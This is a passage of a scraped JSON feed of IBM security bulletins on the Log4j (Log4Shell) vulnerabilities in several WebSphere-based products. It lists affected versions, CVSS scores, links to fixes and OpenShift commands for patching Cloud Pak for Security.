Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n_For 8.0.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH27\",\"label\":\"Rational ClearCase\"},\"Component\":\"CCRC WAN Server\",\"Platform\":[{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"All versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T00:14:31", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2021-4104, CVE-2021-45046, CVE-2021-38951)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-29T00:14:31", "id": "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "href": "https://www.ibm.com/support/pages/node/6528836", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:47:55", "description": "## Summary\n\nCloud Pak for Security (CP4S) v1.9.0.0 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated versions of CP4S images. Please see remediation steps below to apply fix. All customers are encouraged to act quickly to update their systems. Please note, this security bulletin has been superseded by Security Bulletin: Cloud Pak for Security is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046) - see https://www.ibm.com/support/pages/node/6541156. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \nCloud Pak for Security (CP4S)| 1.7.2.0 \n \n## Remediation/Fixes\n\n**For Cloud Pak for Security 1.8.x and 1.9.x :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\n \noc login &lt;openshift_url&gt; -u &lt;username&gt; -p &lt;password&gt; \n \nUsing a token:\n\n \noc login --token=&lt;token&gt; \\--server=&lt;openshift_url&gt; \n \n \nCheck the current value of `imagePullPolicy` using the command : \n \noc get -n &lt;CP4S_NAMESPACE&gt; cp4sthreatmanagement threatmgmt -o yaml | grep imagePullPolicy: \n \nIf `imagePullPolicy` is not set to \"Always\" : \n \noc patch -n &lt;CP4S_NAMESPACE&gt; cp4sthreatmanagement threatmgmt --type merge --patch '{\"spec\":{\"extendedDeploymentConfiguration\":{\"imagePullPolicy\":\"Always\"}}}' \n \nElse, if the `imagePullPolicy` value is already set to \"Always\" : \n \noc delete pod -lsequence=idrmapp -n &lt;CP4S_NAMESPACE&gt; \n \nAfter executing either of the above commands the pods will restart which can be monitored using : \n \noc get pods -n &lt;CP4S_NAMESPACE&gt; -w** \n \n** \n\n\n**For Cloud Pak for Security 1.7.2.0 :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\noc login &lt;openshift_url&gt; -u &lt;username&gt; -p &lt;password&gt; \n\n\nUsing a token:\n\noc login --token=&lt;token&gt; \\--server=&lt;openshift_url&gt;\n\nSelect your CP4S namespace :\n\noc project _&lt;CP4S_NAMESPACE&gt;_\n\nCheck the current value of `imagePullPolicy` : \n\noc get iscinventory iscplatform -o yaml | grep imagePullPolicy:\n\nIf the value of `imagePullPolicy` is not set to \u201cAlways\u201d :\n\noc patch iscinventory iscplatform --type merge --patch '{\"spec\":{\"definitions\":{\"imagePullPolicy\": \"Always\"}}}' &amp;&amp; oc delete pod -lname=sequences\n\nElse if the value of the `imagePullPolicy` is already set to \u201cAlways\u201d : \n\no_c delete pod -lsequence=idrmapp_\n\nAfter executing either of the above commands the idrm pods will restart which can be monitored using :\n\noc get pods -w\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nRHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE-2021-44228) (CVE-2021-4104) <https://access.redhat.com/security/vulnerabilities/RHSB-2021-009>\n\nX-Force Database: <https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>\n\nElastic Search: <https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTDPP\",\"label\":\"IBM Cloud Pak for Security\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.9.0.0, 1.8.1.0, 1.8.0.0, 1.7.2.0 \",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T11:34:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Cloud Pak for Security (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-17T11:34:23", "id": "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "href": "https://www.ibm.com/support/pages/node/6527154", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-06T21:48:20", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM WebSphere Remote Server - Product Family| All \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server. \n \n\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version**\n\n| \n\n**Affected Supporting Product Security Bulletin** \n \n---|---|--- \n \nWebSphere Remote Server \n9.0, 8.5, 7.1, 7.0\n\n| \n\nWebSphere Application Server 9.0, 8.5, 8.0\n\n| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUNCX\",\"label\":\"WebSphere Remote Server\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"9.0, 8.5, 7.1, 7.0 \",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T16:41:40", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities have been identified in WebSphere Application Server shipped with WebSphere Remote Server", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2021-12-17T16:41:40", "id": "0B62A979A39E5FDD103EF50E44280DC84E1DA4B8937991D39D2F70B94DE5CDC6", "href": "https://www.ibm.com/support/pages/node/6527932", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-13T23:33:04", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped with IBM Security Identity Manager (ISIM). Information about security vulnerabilities affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nISIM| 6.0.0 \nISIM| 6.0.2 \nIBM Security Verify Governance, Identity Manager software component| All \n \n\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version(s)| Affected Supporting Product Security Bulletin \n---|---|--- \nISIM 6.0.0 | WAS 7.0, 8.5| \n\n# [Security Bulletin:Multiple vulnerabilities in Apache Log4j affects WebSphere Application Server traditional(CVE-2021-4104,CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin:Multiple vulnerabilities in Apache Log4j affects WebSphere Application Server traditional\\(CVE-2021-4104,CVE-2021-45046\\)\" ) \n \nISIM 6.0.2, \n\nIBM Security Verify Governance, Identity Manager software component \n\n| WAS 9.0 \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n12 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRMWJ\",\"label\":\"IBM Security Identity Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"ISIM 6.0, ISIM 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T19:29:05", "type": "ibm", "title": "Security Bulletin:Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Security Identity Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-12T19:29:05", "id": "CA643463AA3DD27CF347651D7B084BEA39601B3E21A99AD0FE90A4163037F126", "href": "https://www.ibm.com/support/pages/node/6540290", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T23:44:53", "description": "## Summary\n\nThis bulletin provides information for addressing the Apache Log4j vulnerabilities (CVE-2021-4104, CVE-2021-45046) in IBM Workload Scheduler by remediating the vulnerabilities in IBM WebSphere Application Server (WAS) and IBM WebSphere Application Server Liberty.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Workload Scheduler| 9.5 \nIBM Workload Scheduler| 9.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. \n**\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM WebSphere Application Server and IBM WebSphere Application Server Liberty which are shipped with IBM Workload Scheduler.\n\n<https://www.ibm.com/support/pages/node/6526750>\n\n * Implementing the Remediation/Fixes detailed in the WAS bulletin addresses the vulnerabilities for the IBM Workload Scheduler versions listed in the Affected Products/Versions section. Note that IWS 9.5 Liberty is not configured with features zosConnect-1.0 and zosConnect-1.2 so it is not affected.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSGSPN\",\"label\":\"IBM Workload Scheduler\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"9.4 9.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T09:19:17", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Workload Scheduler (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-10T09:19:17", "id": "C2D7FDE6929D1789B9A1618D087E5DCB3FC2780B2EC1CA3CFF40FDF3AD014A8E", "href": "https://www.ibm.com/support/pages/node/6539426", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-11T13:42:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM Tivoli Federated Identity Manager. Information about security vulnerabilities (CVE-2021-4104, CVE-2021-45046) affecting IBM WebSphere Application Server have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Tivoli Federated Identity Manager| 6.2.0 - 6.2.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading. Refer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server which is/are shipped with IBM Tivoli Federated Identity Manager. \n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version**\n\n| \n\n**Affected Supporting Product Security Bulletin** \n \n---|---|--- \nIBM Tivoli Federated Identity Manager 6.2.0 - 6.2.2| IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0| \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Product\":{\"code\":\"SSZSXU\",\"label\":\"Tivoli Federated Identity Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.2.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T18:33:41", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Federated Identity Manager is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-4104,\u00a0 CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-10T18:33:41", "id": "73EAFB98AF656367DD4CBD6C4D9BDB98FBF39B358F625D93589F37D52771AA8D", "href": "https://www.ibm.com/support/pages/node/6539538", "cvss": {"score": 6.0, "vector": 